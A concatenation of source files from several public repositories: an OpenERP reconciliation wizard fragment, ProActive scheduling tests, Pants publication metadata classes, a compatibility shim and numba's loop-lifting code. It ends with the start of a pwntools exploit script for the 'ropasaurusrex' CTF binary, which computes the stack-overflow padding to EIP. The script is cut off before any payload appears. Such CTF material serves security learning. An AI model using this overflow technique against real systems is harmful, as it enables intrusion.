return len(map(lambda x: x[0], cr.fetchall())) + 1
def _get_partner(self, cr, uid, context=None):
move_line_obj = self.pool.get('account.move.line')
partner = move_line_obj.list_partners_to_reconcile(cr, uid, context=context)
if not partner:
return False
return partner[0][0]
def data_get(self, cr, uid, to_reconcile, today_reconciled, context=None):
return {'progress': (100 / (float(to_reconcile + today_reconciled) or 1.0)) * today_reconciled}
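# Worked example: with to_reconcile=3 and today_reconciled=1 the progress
# is (100 / 4.0) * 1 = 25.0 percent; the `or 1.0` guard avoids a division
# by zero when both counters are zero.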
def default_get(self, cr, uid, fields, context=None):
res = super(account_partner_reconcile_process, self).default_get(cr, uid, fields, context=context)
if 'to_reconcile' in res and 'today_reconciled' in res:
data = self.data_get(cr, uid, res['to_reconcile'], res['today_reconciled'], context)
res.update(data)
return res
def next_partner(self, cr, uid, ids, context=None):
if context is None:
context = {}
move_line_obj = self.pool.get('account.move.line')
res_partner_obj = self.pool.get('res.partner')
partner_id = move_line_obj.read(cr, uid, context['active_id'], ['partner_id'])['partner_id']
if partner_id:
res_partner_obj.write(cr, uid, partner_id[0], {'last_reconciliation_date': time.strftime('%Y-%m-%d')}, context)
#TODO: we have to find a way to update the context of the current tab (we could open a new tab with the context but it's not really handy)
#TODO: remove that comments when the client side dev is done
return {'type': 'ir.actions.act_window_close'}
_columns = {
'to_reconcile': fields.float('Remaining Partners', readonly=True, help='These are the remaining partners for whom you should check whether there is something to reconcile. This figure already counts the current partner as reconciled.'),
'today_reconciled': fields.float('Partners Reconciled Today', readonly=True, help='This figure depicts the total number of partners that have gone through the reconciliation process today. The current partner is counted as already processed.'),
'progress': fields.float('Progress', readonly=True, help='Shows you the progress made today on the reconciliation process. Given by \nPartners Reconciled Today / (Remaining Partners + Partners Reconciled Today)'),
'next_partner_id': fields.many2one('res.partner', 'Next Partner to Reconcile', readonly=True, help='This field shows you the next partner that will be automatically chosen by the system to go through the reconciliation process, based on the latest day it has been reconciled.'), # TODO: remove the readonly=True when the client side allows updating the context of the existing tab, so that the user can change this value if he doesn't want to follow the openerp proposal
}
_defaults = {
'to_reconcile': _get_to_reconcile,
'today_reconciled': _get_today_reconciled,
'next_partner_id': _get_partner,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
ow2-proactive/agent-linux
|
refs/heads/master
|
palinagent/daemon/tests/testEventGenerator.py
|
1
|
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
#################################################################
#
# ProActive Parallel Suite(TM): The Java(TM) library for
# Parallel, Distributed, Multi-Core Computing for
# Enterprise Grids & Clouds
#
# Copyright (C) 1997-2011 INRIA/University of
# Nice-Sophia Antipolis/ActiveEon
# Contact: proactive@ow2.org or contact@activeeon.com
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public License
# as published by the Free Software Foundation; version 3 of
# the License.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
# If needed, contact us to obtain a release under GPL Version 2 or 3
# or a different license than the AGPL.
#
# Initial developer(s): The ProActive Team
# http://proactive.inria.fr/team_members.htm
# Contributor(s):
#
#################################################################
# $$ACTIVEEON_INITIAL_DEV$$
#################################################################
import math
import time
import unittest
import os
import palinagent.daemon.main as main
import palinagent.daemon.eventgenerator as eventgenerator
from palinagent.daemon.errors import AgentError as AgentError
from palinagent.daemon.errors import AgentInternalError as AgentInternalError
from palinagent.daemon.eventgenerator import _ONE_WEEK_IN_SECS as _ONE_WEEK_IN_SECS
from palinagent.daemon.eventgenerator import StartEvent as StartEvent
from palinagent.daemon.eventgenerator import StopEvent as StopEvent
from palinagent.daemon.eventgenerator import Event as Event
from palinagent.daemon.eventgenerator import CalendarEventGenerator as CalendarEventGenerator
def almostEquals(value1, value2, sigma=2):
''' Some tests use current time so strict equality cannot be used '''
return math.fabs(value2 - value1) <= sigma
class TestEvent(unittest.TestCase):
'''
Test the event class
It mostly checks that an exception is thrown when an invalid value is given
or an error is encountered
'''
def testInit(self):
''' Check that the Event ctor does not accept invalid values '''
# startOffset must be positive
e = Event(-1, 100, None, None)
self.assertRaises(AgentError, e.check)
# duration must be strictly positive
e = Event(0, 0, None, None)
self.assertRaises(AgentError, e.check)
# Too long duration
e = Event(0, _ONE_WEEK_IN_SECS, None, None)
self.assertRaises(AgentError, e.check)
def testStopOffset(self):
''' Check the stopOffset is correctly computed from startOffset and duration'''
event = Event(100, 200, None, None)
self.assertEqual(300, event.stopOffset)
def testToString(self):
''' Check to string '''
# Check it does not raise an exception
Event(100, 200, None, None).__str__()
class TestSpecificEvent(unittest.TestCase):
def test_epoch_date(self):
#print int(time.time())
#print time.asctime(time.localtime(time.time()))
event = Event(0, 10, None, None)
start_event = StartEvent(event, 0)
#print time.asctime(time.localtime(start_event.epoch_date))
stop_event = StopEvent(event, 0)
#print time.asctime(time.localtime(stop_event.epoch_date))
event = Event(_ONE_WEEK_IN_SECS - 20, 10, None, None)
start_event = StartEvent(event, 0)
#print time.asctime(time.localtime(start_event.epoch_date))
stop_event = StopEvent(event, 0)
#print time.asctime(time.localtime(stop_event.epoch_date))
class TestCalendarEventGenerator(unittest.TestCase):
'''
Test the calendar event generator
The generator is configured by hand, then we check that the generator
outputs the right events.
'''
def testCheckOverlapping(self):
''' Check that an exception is raised if two events overlap '''
#Empty calendar
evg = CalendarEventGenerator()
evg.check_overlapping()
# Single event calendar
evg = CalendarEventGenerator()
evg.events = [Event(0, 100, None, None)]
evg.check_overlapping()
# No overlapping
evg = CalendarEventGenerator()
evg.events = [Event(0, 100, None, None), Event(200, 300, None, None), Event(500, 1000, None, None)]
evg.check_overlapping()
# No overlapping but sunday / monday overlap
evg = CalendarEventGenerator()
evg.events = [Event(200, 100, None, None), Event(_ONE_WEEK_IN_SECS - 100, 200, None, None)]
evg.check_overlapping()
# No overlapping but join
evg = CalendarEventGenerator()
evg.events = [Event(0, 100, None, None), Event(100, 300, None, None), Event(400, 1000, None, None)]
evg.check_overlapping()
# Basic overlapping
evg = CalendarEventGenerator()
evg.events = [Event(0, 100, None, None), Event(50, 100, None, None)]
self.assertRaises(AgentError, evg.check_overlapping)
# End of week overlapping
evg = CalendarEventGenerator()
evg.events = [Event(0, 100, None, None), Event(_ONE_WEEK_IN_SECS - 1, 100, None, None)]
self.assertRaises(AgentError, evg.check_overlapping)
def testNextEvent(self):
''' Test the event generator '''
class Action:
def getStart(self, config):
return lambda :self._start(config)
def _start(self, config):
return "START"
def getRestart(self, config):
return lambda :self._restart(config)
def _restart(self, config):
return "RESTART"
action = Action()
# No event
evg = CalendarEventGenerator(action)
g = evg.getActions()
self.assertRaises(AgentInternalError, g.next)
# One and only one event starting by start
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(0+bias, 100, None, None)]
g = evg.getActions()
for i in range(1000):
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals((i * eventgenerator._ONE_WEEK_IN_SECS) + 100, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
# One and only one event starting by stop
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(bias - 100, 200, None, None)]
g = evg.getActions()
(event) = g.next()
assert almostEquals(0, event.seconds_remaining())
self.assertEqual(event.type, "START")
for i in range(1000):
(event) = g.next()
assert almostEquals((i * eventgenerator._ONE_WEEK_IN_SECS) + 100, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
(event) = g.next()
assert almostEquals((i+1) * eventgenerator._ONE_WEEK_IN_SECS - 100, event.seconds_remaining())
self.assertEqual(event.type, "START")
# First event is next week
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(0, 10, None, None)]
g = evg.getActions()
for i in range(1000):
(event) = g.next()
assert almostEquals(eventgenerator._ONE_WEEK_IN_SECS - bias + (i*eventgenerator._ONE_WEEK_IN_SECS), event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals(eventgenerator._ONE_WEEK_IN_SECS - bias + (i*eventgenerator._ONE_WEEK_IN_SECS) + 10, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
# Two simple events and only one event starting by stop
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(bias + 100, 200, None, None), Event(bias + 1000, 400, None, None)]
g = evg.getActions()
for i in range(1000):
(event) = g.next()
assert almostEquals((i * eventgenerator._ONE_WEEK_IN_SECS) + 100, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS + 300, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS + 1000, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS + 1400, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
# Next event is next week, with week overlapping and multi event
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(bias - 500, 100, None, None), Event(bias - 300, 101, None, None), Event(bias - 100, eventgenerator._ONE_WEEK_IN_SECS-1000, None, None)]
g = evg.getActions()
for i in range(1000):
(event) = g.next()
assert almostEquals(eventgenerator._ONE_WEEK_IN_SECS - 1100 + (i*eventgenerator._ONE_WEEK_IN_SECS), event.seconds_remaining())
self.assertEqual(event.type, "STOP")
(event) = g.next()
assert almostEquals((i+1)*eventgenerator._ONE_WEEK_IN_SECS -500, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals((i+1)*eventgenerator._ONE_WEEK_IN_SECS -400, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
(event) = g.next()
assert almostEquals((i+1)*eventgenerator._ONE_WEEK_IN_SECS -300, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals((i+1)*eventgenerator._ONE_WEEK_IN_SECS -199, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
(event) = g.next()
assert almostEquals((i+1)*eventgenerator._ONE_WEEK_IN_SECS -100, event.seconds_remaining())
self.assertEqual(event.type, "START")
# Restart
bias = eventgenerator._seconds_elespased_since_start_of_week()
evg = CalendarEventGenerator(action)
evg.events = [Event(0+bias, 100, None, None), Event(100+bias, 100, None, None)]
g = evg.getActions()
for i in range(1000):
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS, event.seconds_remaining())
self.assertEqual(event.type, "START")
(event) = g.next()
assert almostEquals(i * eventgenerator._ONE_WEEK_IN_SECS + 100, event.seconds_remaining())
self.assertEqual(event.type, "RESTART")
(event) = g.next()
assert almostEquals((i * eventgenerator._ONE_WEEK_IN_SECS) + 200, event.seconds_remaining())
self.assertEqual(event.type, "STOP")
class TestParser(unittest.TestCase):
'''
Check that the parser is able to get the data from the XML configuration file
'''
def testParseFile(self):
tree = main._parse_config_file(os.path.join(os.path.dirname(__file__), "./eventgeneratorTest_test_parse_file.xml"))
evg = eventgenerator.parse(tree, None)
# This event does not redefine the configuration
event = evg.events[0]
self.assertEqual("proactiveHome1", event.config.proactiveHome)
self.assertEqual("javaHome1", event.config.javaHome)
self.assertEqual(["param1"], event.config.jvmParameters)
# self.assertEqual(1, event.config.memoryLimit)
self.assertEqual(1, event.config.nbRuntimes)
self.assertEqual("script1", event.config.onRuntimeExitScript)
self.assertEqual((6000, 6002), event.config.portRange)
# This event redefines the whole configuration
event = evg.events[1]
self.assertEqual("proactiveHome2", event.config.proactiveHome)
self.assertEqual("javaHome2", event.config.javaHome)
self.assertEqual(["param2"], event.config.jvmParameters)
# self.assertEqual(2, event.config.memoryLimit)
self.assertEqual(2, event.config.nbRuntimes)
self.assertEqual("script2", event.config.onRuntimeExitScript)
self.assertEqual((6003, 6007), event.config.portRange)
# This event redefines only a part of the configuration
event = evg.events[2]
self.assertEqual("proactiveHome1", event.config.proactiveHome)
self.assertEqual("javaHome3", event.config.javaHome)
self.assertEqual(["param1"], event.config.jvmParameters)
# self.assertEqual(1, event.config.memoryLimit)
self.assertEqual(3, event.config.nbRuntimes)
self.assertEqual("script3", event.config.onRuntimeExitScript)
self.assertEqual((6000, 6002), event.config.portRange)
def testCoherentState(self):
tree = main._parse_config_file(os.path.join(os.path.dirname(__file__), "./eventgeneratorTest_test_parse_file.xml"))
evg = eventgenerator.parse(tree, None)
evg.check()
if __name__ == "__main__":
unittest.main()
|
sid-kap/pants
|
refs/heads/master
|
src/python/pants/backend/jvm/ossrh_publication_metadata.py
|
31
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import six
from pants.backend.jvm.artifact import PublicationMetadata
from pants.base.validation import assert_list
def _validate_maybe_string(name, item):
if item and not isinstance(item, six.string_types):
raise ValueError('{} was expected to be a string but given {} of type {}'.format(name, item, type(item)))
return item
def _validate_string(name, item):
if not item:
raise ValueError('{} is a required field'.format(name))
return _validate_maybe_string(name, item)
class Scm(object):
"""Corresponds to the maven POM <scm/> element.
Refer to the schema here: http://maven.apache.org/maven-v4_0_0.xsd
"""
@classmethod
def github(cls, user, repo):
"""Creates an `Scm` for a github repo.
:param string user: The github user or organization name the repo is hosted under.
:param string repo: The repository name.
:returns: An `Scm` representing the github repo.
"""
# For the url format, see: http://maven.apache.org/scm/git.html
params = dict(user=user, repo=repo)
connection = 'scm:git:git@github.com:{user}/{repo}.git'.format(**params)
url = 'https://github.com/{user}/{repo}'.format(**params)
return cls(connection=connection, developer_connection=connection, url=url)
def __init__(self, connection, developer_connection, url, tag=None):
"""See http://maven.apache.org/scm/scms-overview.html for valid connection formats for your scm.
:param string connection: The scm connection string for read-only access to the scm.
:param string developer_connection: The scm connection string for read-write access to the scm.
:param string url: An url pointing to a browseable web interface for the scm.
:param string tag: An optional tag corresponding to the published release. This will be
populated by pants during publish runs.
"""
self.connection = _validate_string('connection', connection)
self.developer_connection = _validate_string('developer_connection', developer_connection)
self.url = _validate_string('url', url)
self.tag = _validate_maybe_string('tag', tag)
def tagged(self, tag):
"""Creates a new `Scm` identical to this `Scm` but with the given `tag`."""
return Scm(self.connection, self.developer_connection, self.url, tag=tag)
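# A hedged usage sketch (user and repo names are hypothetical):
# scm = Scm.github(user='example-org', repo='example-repo')
# scm.url == 'https://github.com/example-org/example-repo'
# scm.tagged('v1.0.0').tag == 'v1.0.0'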
class License(object):
"""Corresponds to the maven POM <license/> element.
Refer to the schema here: http://maven.apache.org/maven-v4_0_0.xsd
"""
def __init__(self, name, url, comments=None):
"""
:param string name: The full official name of the license.
:param string url: An url pointing to the license text.
:param string comments: Optional comments clarifying the license.
"""
self.name = _validate_string('name', name)
self.url = _validate_string('url', url)
self.comments = _validate_maybe_string('comments', comments)
class Developer(object):
"""Corresponds to the maven POM <developer/> element.
Refer to the schema here: http://maven.apache.org/maven-v4_0_0.xsd
"""
def __init__(self, user_id=None, name=None, email=None, url=None, organization=None,
organization_url=None, roles=None):
"""One of `user_id`, `name`, or `email` is required, all other parameters are optional.
:param string user_id: The user id of the developer; typically the one used to access the scm.
:param string name: The developer's full name.
:param string email: the developer's email address.
:param string url: An optional url pointing to more information about the developer.
:param string organization: An optional name for the organization the developer works on the
library for.
:param string organization_url: An optional url pointing to more information about the
developer's organization.
:param list roles: An optional list of role names that apply to this developer on this project.
"""
if not (user_id or name or email):
raise ValueError("At least one of 'user_id', 'name' or 'email' must be specified for each "
"developer.")
self.user_id = _validate_maybe_string('user_id', user_id)
self.name = _validate_maybe_string('name', name)
self.email = _validate_maybe_string('email', email)
self.url = _validate_maybe_string('url', url)
self.organization = _validate_maybe_string('organization', organization)
self.organization_url = _validate_maybe_string('organization_url', organization_url)
self.roles = assert_list(roles, key_arg='roles')
@property
def has_roles(self):
"""Returns `True` if this developer has one or more roles."""
# TODO(John Sirois): This is a layer leak - it only supports mustache rendering.
# Consider converting the OSSRHPublicationMetadata tree to a suitable form for mustache
# rendering where the rendering occurs (currently just in the JarPublish task).
return bool(self.roles)
class OSSRHPublicationMetadata(PublicationMetadata):
"""Corresponds to the Sonatype required fields for jars published to OSSRH.
See: http://central.sonatype.org/pages/requirements.html#sufficient-metadata
"""
def __init__(self, description, url, licenses, developers, scm, name=None):
"""All parameters are required except for `name` to pass OSSRH requirements.
:param string description: A description of the library.
:param string url: An url pointing to more information about the library.
:param list licenses: The licenses that apply to the library.
:param list developers: The developers who work on the library.
:param scm: The primary scm system hosting the library source code.
:param string name: The optional full name of the library. If not supplied an appropriate name
will be synthesized.
"""
def validate_nonempty_list(list_name, item, expected_type):
assert_list(item, expected_type=expected_type, can_be_none=False, key_arg=list_name, allowable=(list,))
if not item:
raise ValueError('At least 1 entry is required in the {} list.'.format(list_name))
return item
self.description = _validate_string('description', description)
self.url = _validate_string('url', url)
self.licenses = validate_nonempty_list('licenses', licenses, License)
self.developers = validate_nonempty_list('developers', developers, Developer)
if not isinstance(scm, Scm):
raise ValueError("scm must be an instance of Scm")
self.scm = scm
self.name = _validate_maybe_string('name', name)
def _compute_fingerprint(self):
# TODO(John Sirois): Untangle a JvmTarget's default fingerprint from the `provides` payload
# fingerprint. Only the JarPublish task would be a consumer for this and today it rolls its
# own hash besides. For now just short-circuit the fingerprint, but after untangling, consider
# implementing a fingerprint consistent with the need to re-publish to maven central.
return None
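# A hedged end-to-end sketch (all values are hypothetical, not from the
# original file):
# metadata = OSSRHPublicationMetadata(
#     description='An example library.',
#     url='https://example.org/library',
#     licenses=[License(name='Apache License, Version 2.0',
#                       url='http://www.apache.org/licenses/LICENSE-2.0')],
#     developers=[Developer(user_id='jdoe', name='Jane Doe')],
#     scm=Scm.github(user='example-org', repo='example-repo'))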
|
gdub/python-archive
|
refs/heads/master
|
archive/compat.py
|
2
|
"""
A module for providing backwards compatibility for Python versions.
"""
import sys
IS_PY2 = sys.version_info[0] == 2
if IS_PY2:
def is_string(obj):
return isinstance(obj, basestring)
else:
def is_string(obj):
return isinstance(obj, str)
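# Example: is_string('abc') and is_string(u'abc') are True under both
# branches (u'abc' is a `unicode` instance, caught by the Python 2
# basestring check), while is_string(42) is False.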
|
ssarangi/numba
|
refs/heads/master
|
numba/looplifting.py
|
6
|
from __future__ import print_function, division, absolute_import
from numba import utils
from numba.bytecode import ByteCodeInst, CustomByteCode
from collections import defaultdict
def lift_loop(bytecode, dispatcher_factory):
"""Lift the top-level loops.
Returns (outer, loops)
------------------------
* outer: ByteCode of a copy of the loop-less function.
* loops: a list of ByteCode of the loops.
"""
outer = []
loops = []
# Discover variables references
outer_rds, outer_wrs = find_varnames_uses(bytecode, iter(bytecode))
# Separate loops and outer
separate_loops(bytecode, outer, loops)
# Prepend arguments as negative bytecode offset
for a in bytecode.pysig.parameters:
outer_wrs[a] = [-1] + outer_wrs[a]
dispatchers = []
outerlabels = set(bytecode.labels)
outernames = list(bytecode.co_names)
for loop in loops:
args, rets = discover_args_and_returns(bytecode, loop, outer_rds,
outer_wrs)
disp = insert_loop_call(bytecode, loop, args,
outer, outerlabels, rets,
dispatcher_factory)
dispatchers.append(disp)
# Build outer bytecode
codetable = utils.SortedMap((i.offset, i) for i in outer)
outerbc = CustomByteCode(func=bytecode.func,
func_qualname=bytecode.func_qualname,
is_generator=bytecode.is_generator,
pysig=bytecode.pysig,
filename=bytecode.filename,
co_names=outernames,
co_varnames=bytecode.co_varnames,
co_consts=bytecode.co_consts,
co_freevars=bytecode.co_freevars,
table=codetable,
labels=outerlabels & set(codetable.keys()))
return outerbc, dispatchers
@utils.total_ordering
class SubOffset(object):
"""The loop-jitting may insert bytecode between two bytecode but we
cannot guarantee that there is enough integral space between two offsets.
This class workaround the problem by introducing a fractional part to the
offset.
"""
def __init__(self, val, sub=1):
assert sub > 0, "fractional part cannot be <= 0"
self.val = val
self.sub = sub
def next(self):
"""Helper method to get the next suboffset by incrementing the
fractional part only
"""
return SubOffset(self.val, self.sub + 1)
def __add__(self, other):
"""Adding to a suboffset will only increment the fractional part.
The integral part is immutable.
"""
return SubOffset(self.val, self.sub + other)
def __hash__(self):
return hash((self.val, self.sub))
def __lt__(self, other):
"""Can only compare to SubOffset or int
"""
if isinstance(other, SubOffset):
if self.val < other.val:
return True
elif self.val == other.val:
return self.sub < other.sub
else:
return False
elif isinstance(other, int):
return self.val < other
else:
return NotImplemented
def __eq__(self, other):
if isinstance(other, SubOffset):
return self.val == other.val and self.sub == other.sub
elif isinstance(other, int):
            # Can never be equal to an integer by definition
return False
else:
return NotImplemented
def __repr__(self):
"""Print like a floating-point by it is not one at all.
"""
return "{0}.{1}".format(self.val, self.sub)
def insert_loop_call(bytecode, loop, args, outer, outerlabels, returns,
dispatcher_factory):
endloopoffset = loop[-1].next
# Accepted. Create a bytecode object for the loop
args = tuple(args)
lbc = make_loop_bytecode(bytecode, loop, args, returns)
# Generate dispatcher for this inner loop, and append it to the
# consts tuple.
disp = dispatcher_factory(lbc)
disp_idx = len(bytecode.co_consts)
bytecode.co_consts += (disp,)
# Insert jump to the end
insertpt = SubOffset(loop[0].next)
jmp = ByteCodeInst.get(loop[0].offset, 'JUMP_ABSOLUTE', insertpt)
jmp.lineno = loop[0].lineno
insert_instruction(outer, jmp)
outerlabels.add(outer[-1].next)
# Prepare arguments
loadfn = ByteCodeInst.get(insertpt, "LOAD_CONST", disp_idx)
loadfn.lineno = loop[0].lineno
insert_instruction(outer, loadfn)
insertpt = insertpt.next()
for arg in args:
loadarg = ByteCodeInst.get(insertpt, 'LOAD_FAST',
bytecode.co_varnames.index(arg))
loadarg.lineno = loop[0].lineno
insert_instruction(outer, loadarg)
insertpt = insertpt.next()
# Call function
assert len(args) < 256
call = ByteCodeInst.get(insertpt, "CALL_FUNCTION", len(args))
call.lineno = loop[0].lineno
insert_instruction(outer, call)
insertpt = insertpt.next()
if returns:
# Unpack arguments
unpackseq = ByteCodeInst.get(insertpt, "UNPACK_SEQUENCE",
len(returns))
unpackseq.lineno = loop[0].lineno
insert_instruction(outer, unpackseq)
insertpt = insertpt.next()
for out in returns:
# Store each variable
storefast = ByteCodeInst.get(insertpt, "STORE_FAST",
bytecode.co_varnames.index(out))
storefast.lineno = loop[0].lineno
insert_instruction(outer, storefast)
insertpt = insertpt.next()
else:
# No return value
poptop = ByteCodeInst.get(insertpt, "POP_TOP", None)
poptop.lineno = loop[0].lineno
insert_instruction(outer, poptop)
insertpt = insertpt.next()
jmpback = ByteCodeInst.get(insertpt, 'JUMP_ABSOLUTE',
endloopoffset)
jmpback.lineno = loop[0].lineno
insert_instruction(outer, jmpback)
return disp
def insert_instruction(insts, item):
i = find_previous_inst(insts, item.offset)
insts.insert(i, item)
def find_previous_inst(insts, offset):
for i, inst in enumerate(insts):
if inst.offset > offset:
return i
return len(insts)
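# e.g. for instructions at offsets [0, 3, 9] (illustrative), a target offset
# of 5 returns index 2, so insert_instruction splices the new instruction in
# just before the offset-9 instruction.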
def make_loop_bytecode(bytecode, loop, args, returns):
# Add return None
co_consts = tuple(bytecode.co_consts)
if None not in co_consts:
co_consts += (None,)
if returns:
for out in returns:
# Load output
loadfast = ByteCodeInst.get(loop[-1].next, "LOAD_FAST",
bytecode.co_varnames.index(out))
loadfast.lineno = loop[-1].lineno
loop.append(loadfast)
# Build tuple
buildtuple = ByteCodeInst.get(loop[-1].next, "BUILD_TUPLE",
len(returns))
buildtuple.lineno = loop[-1].lineno
loop.append(buildtuple)
else:
# Load None
load_none = ByteCodeInst.get(loop[-1].next, "LOAD_CONST",
co_consts.index(None))
load_none.lineno = loop[-1].lineno
loop.append(load_none)
# Return TOS
return_value = ByteCodeInst.get(loop[-1].next, "RETURN_VALUE", 0)
return_value.lineno = loop[-1].lineno
loop.append(return_value)
# Function name
loop_qualname = bytecode.func_qualname + ".__numba__loop%d__" % loop[0].offset
# Code table
codetable = utils.SortedMap((i.offset, i) for i in loop)
# Custom bytecode object
lbc = CustomByteCode(func=bytecode.func,
func_qualname=loop_qualname,
# Enforced in separate_loops()
is_generator=False,
pysig=bytecode.pysig,
arg_count=len(args),
arg_names=args,
filename=bytecode.filename,
co_names=bytecode.co_names,
co_varnames=bytecode.co_varnames,
co_consts=co_consts,
co_freevars=bytecode.co_freevars,
table=codetable,
labels=bytecode.labels)
return lbc
def stitch_instructions(outer, loop):
begin = loop[0].offset
i = find_previous_inst(outer, begin)
return outer[:i] + loop + outer[i:]
def remove_from_outer_use(inneruse, outeruse):
for name in inneruse:
inuse = inneruse[name]
outuse = outeruse[name]
outeruse[name] = sorted(list(set(outuse) - set(inuse)))
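# e.g. (illustrative) inneruse == {'x': [4]} and outeruse == {'x': [2, 4, 8]}
# leaves outeruse == {'x': [2, 8]}: uses local to the loop are subtracted out.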
def discover_args_and_returns(bytecode, insts, outer_rds, outer_wrs):
"""
Basic analysis for args and returns
    This completely ignores the ordering of the read-writes.
outer_rds and outer_wrs are modified
Note:
    An invalid argument and return set will likely cause a RuntimeWarning
in the dataflow analysis due to mismatch in stack offset.
"""
rdnames, wrnames = find_varnames_uses(bytecode, insts)
# Remove all local use from the set
remove_from_outer_use(rdnames, outer_rds)
remove_from_outer_use(wrnames, outer_wrs)
    # Return every variable that is written inside the loop and read
# afterwards
rets = set()
for name, uselist in wrnames.items():
if name in outer_rds:
endofloop = insts[-1].offset
# Find the next read
for nextrd in outer_rds[name]:
if nextrd > endofloop:
break
else:
nextrd = None
# Find the next write
for nextwr in outer_wrs[name]:
if nextwr > endofloop:
break
else:
nextwr = None
# If there is a read but no write OR
# If the next use is a read, THEN
# it is a return value
if nextrd is not None and (nextwr is None or nextwr > nextrd):
rets.add(name)
    # Make variables arguments if they are read inside the loop but defined
    # before the loop. Since we can't tell whether things are conditionally
    # defined here, we have to be conservative.
args = set()
firstline = insts[0].offset
for name in rdnames.keys():
outer_write = outer_wrs[name]
# If there exists a definition before the start of the loop
        # for a variable read inside the loop.
if any(i < firstline for i in outer_write):
args.add(name)
    # Make variables arguments if they are returned but defined before the
# loop.
for name in rets:
if any(i < insts[0].offset for i in outer_wrs[name]):
args.add(name)
# Re-add the arguments back to outer_rds
for name in args:
outer_rds[name] = sorted(set(outer_rds[name]) | set([firstline]))
# Re-add the arguments back to outer_wrs
for name in rets:
outer_wrs[name] = sorted(set(outer_wrs[name]) | set([firstline]))
return args, rets
def find_varnames_uses(bytecode, insts):
rdnames = defaultdict(list)
wrnames = defaultdict(list)
for inst in insts:
if inst.opname == 'LOAD_FAST':
name = bytecode.co_varnames[inst.arg]
rdnames[name].append(inst.offset)
elif inst.opname == 'STORE_FAST':
name = bytecode.co_varnames[inst.arg]
wrnames[name].append(inst.offset)
return rdnames, wrnames
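# Illustrative trace (hypothetical instruction stream): with
# co_varnames == ('x', 'y') and the instructions
#   LOAD_FAST 0 @ offset 0, STORE_FAST 1 @ offset 3, LOAD_FAST 1 @ offset 6
# this returns rdnames == {'x': [0], 'y': [6]} and wrnames == {'y': [3]}.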
def separate_loops(bytecode, outer, loops):
"""
Separate top-level loops from the function
Stores loopless instructions from the original function into `outer`.
Stores list of loop instructions into `loops`.
Both `outer` and `loops` are list-like (`append(item)` defined).
"""
# XXX When an outer loop is rejected, there may be an inner loop
# which would still allow lifting.
endloop = None
cur = None
for inst in bytecode:
if endloop is None:
if inst.opname == 'SETUP_LOOP':
cur = [inst]
# Python may set the end of loop to the final jump destination
                # when nested in an if-else. We need to scan the bytecode to
# find the actual end of loop
endloop = _scan_real_end_loop(bytecode, inst)
else:
outer.append(inst)
else:
cur.append(inst)
if inst.next == endloop:
for inst in cur:
if inst.opname in ['RETURN_VALUE', 'YIELD_VALUE',
'BREAK_LOOP']:
# Reject if return, yield or break inside loop
outer.extend(cur)
break
else:
loops.append(cur)
endloop = None
def _scan_real_end_loop(bytecode, setuploop_inst):
"""Find the end of loop.
Return the instruction offset.
"""
start = setuploop_inst.next
end = start + setuploop_inst.arg
offset = start
depth = 0
while offset < end:
inst = bytecode[offset]
depth += inst.block_effect
if depth < 0:
return inst.next
offset = inst.next
|
Gallopsled/pwntools-write-ups
|
refs/heads/master
|
2013/pctf/ropasaurus2/doit.py
|
3
|
#!/usr/bin/env python
from pwn import *
binary = './ropasaurusrex-85a84f36f81e11f720b1cf5ea0d1fb0d5a603c0d'
# Remote version
l = listen(0)
l.spawn_process([binary])
r = remote('localhost', l.lport)
# Uncomment for local version
# r = process(binary)
#
# If we run with a cyclic pattern, we end up with the following state:
#
# $ cyclic 999 > input
# $ gdb ./ropasaurusrex
# $ run < input
# ...
# EBP: 0x6261616a (b'jaab')
# ESP: 0xffffc7e0 ("laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab\n\310\377\377\030\226\004\b\030\202\004\b")
# EIP: 0x6261616b (b'kaab')
#
# Let's generate a bit of padding to get us up to the edge of EIP control.
#
padding = cyclic(cyclic_find('kaab'))
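#
# Sanity check on that offset (pwntools' cyclic API): the de Bruijn pattern
# starts 'aaaabaaacaaa...', and cyclic_find('kaab') returns the byte offset
# of 'kaab' within it, so `padding` ends exactly at the saved-EIP slot
# observed above.
#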
#
# Load the library and libc from disk
#
rex = ELF(binary)
libc = ELF(next(path for path in rex.libs if 'libc' in path))
